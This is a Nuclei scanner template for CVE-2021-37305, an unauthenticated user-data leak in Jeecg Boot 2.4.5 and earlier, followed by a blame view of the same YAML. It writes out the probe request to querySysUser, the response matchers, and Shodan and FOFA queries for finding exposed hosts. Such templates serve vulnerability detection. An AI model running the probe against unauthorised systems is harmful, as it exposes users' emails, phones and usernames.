nuclei-templates/http/cves/2021/CVE-2021-37305.yaml

id: CVE-2021-37305

info:
  name: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.
  reference:
    - https://github.com/jeecgboot/jeecg-boot/issues/2794
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37305
  classification:
    cve-id: CVE-2021-37305
  metadata:
    max-request: 1
    verified: "true"
    shodan-query: title:"Jeecg-Boot"
    fofa-query: title="JeecgBoot 企业级低代码平台"
  tags: cve,cve2021,jeecg,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"   # add any valid username

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'username":"admin'
          - 'success":true'
          - 'result":{'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
Create CVE-2021-37305.yaml 2023-05-17 19:28:05 +00:00			`id: CVE-2021-37305`

			`info:`
			`name: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure`
			`author: ritikchaddha`
			`severity: high`
			`description: \|`
			`Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.`
			`reference:`
			`- https://github.com/jeecgboot/jeecg-boot/issues/2794`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-37305`
error fix 2023-05-17 19:35:27 +00:00			`classification:`
Create CVE-2021-37305.yaml 2023-05-17 19:28:05 +00:00			`cve-id: CVE-2021-37305`
			`metadata:`
update max-req=> max-request 2023-06-01 17:38:50 +00:00			`max-request: 1`
Create CVE-2021-37305.yaml 2023-05-17 19:28:05 +00:00			`verified: "true"`
			`shodan-query: title:"Jeecg-Boot"`
			`fofa-query: title="JeecgBoot 企业级低代码平台"`
			`tags: cve,cve2021,jeecg,exposure`

			`http:`
			`- method: GET`
			`path:`
fix comments 2023-05-18 10:03:57 +00:00			`- "{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin" # add any valid username`
Create CVE-2021-37305.yaml 2023-05-17 19:28:05 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- 'username":"admin'`
			`- 'success":true'`
			`- 'result":{'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- application/json`

			`- type: status`
			`status:`
			`- 200`